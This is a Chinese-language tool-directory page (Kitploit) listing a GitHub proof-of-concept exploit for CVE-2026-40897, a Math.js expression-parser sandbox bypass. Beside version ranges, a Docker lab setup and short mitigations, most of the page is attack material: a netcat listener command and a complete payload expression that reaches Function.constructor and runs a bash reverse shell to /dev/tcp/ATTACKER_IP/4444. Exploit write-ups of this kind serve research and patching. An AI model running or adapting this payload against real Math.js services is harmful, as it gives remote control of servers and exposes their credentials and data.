Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-40897 — 针对 CVE-2026-40897 的概念验证漏洞利用,该漏洞是 Math.js 表达式解析器沙箱绕过,可通过精心构造的载荷和 Docker 实验环境实现远程代码执行。 | Kitploit
工具/GitHubGitHub/yym8538/cve-2026-40897
漏洞分析漏洞利用Web应用程序漏洞利用安全虚拟化远程访问工具Payload 开发
GitHubyym8538/cve-2026-40897

CVE-2026-40897

针对 CVE-2026-40897 的概念验证漏洞利用,该漏洞是 Math.js 表达式解析器沙箱绕过,可通过精心构造的载荷和 Docker 实验环境实现远程代码执行。

查看仓库
11个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2026-40897 Math.js 表达式解析器中的远程代码执行

★ CVE-2026-40897 Math.js 远程代码执行 PoC ★

https://github.com/user-attachments/assets/8c394039-f00a-4875-991a-fb5f40bc6898


概述

CVE-2026-40897 是 Math.js 表达式解析器中的一个沙箱绕过导致远程代码执行漏洞。 isSafeProperty 过滤器仅检查来自用户表达式的属性访问,而不检查来自内部代码路径的访问。通过 toJSON() 泄露 ArrayNode 的内部数组并覆盖其 .map,攻击者可以迫使内部代码访问 Function.constructor 并执行任意 JavaScript。


受影响版本

类别版本
存在漏洞Math.js 13.1.1 ≤ 版本 ≤ 15.1.1
已修复15.2.0

影响

  • 任意 JavaScript 代码执行(RCE)
  • 访问主机文件系统
  • 反向 shell 连接导致服务器完全被攻陷
  • 窃取后端凭据和敏感数据

环境

docker build -t cve-2026-40897-mathjs-vuln .
docker run --rm -it -p 3000:3000 --name mathjs-vuln cve-2026-40897-mathjs-vuln

PoC

启动存在漏洞的环境后,按照以下步骤复现攻击。

步骤 1. 启动反向 shell 监听器

nc -lvnp 4444

步骤 2. 提交恶意载荷

将以下表达式发送到 math.evaluate(例如,通过应用程序的计算输入)。

array = reviver('',{'mathjs':'ArrayNode'}).toJSON()['items']
array.map = f(callback)=callback({'map':f2(callback2)=callback2({},'constructor'),'type':sum})
functionAssignmentNode = reviver('',{'mathjs':'FunctionAssignmentNode','name':'a','params':array,'expr':reviver('',{'mathjs':'ConstantNode'})})
func = functionAssignmentNode.toJSON()['params']['type']
shell = func('return process.mainModule.require("child_process").execSync("bash -c \'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1\'").toString()')
shell()

步骤 3. 在攻击者一侧确认 shell 访问

目标服务器会回连到攻击者的监听器,从而获得一个交互式 bash shell。


缓解措施

  • 将 Math.js 升级到已修复版本
  • 避免将不受信任的用户输入直接传递给 math.evaluate()
  • 限制通过表达式解析器暴露内部函数/类(reviver、FunctionAssignmentNode、ArrayNode)

分析

  • KR: https://www.skshieldus.com/security-insights/reports/eqst-math-js-rce-cve-2026-40897
  • EN: https://www.skshieldus.com/en/report?tab=eqst
下载工具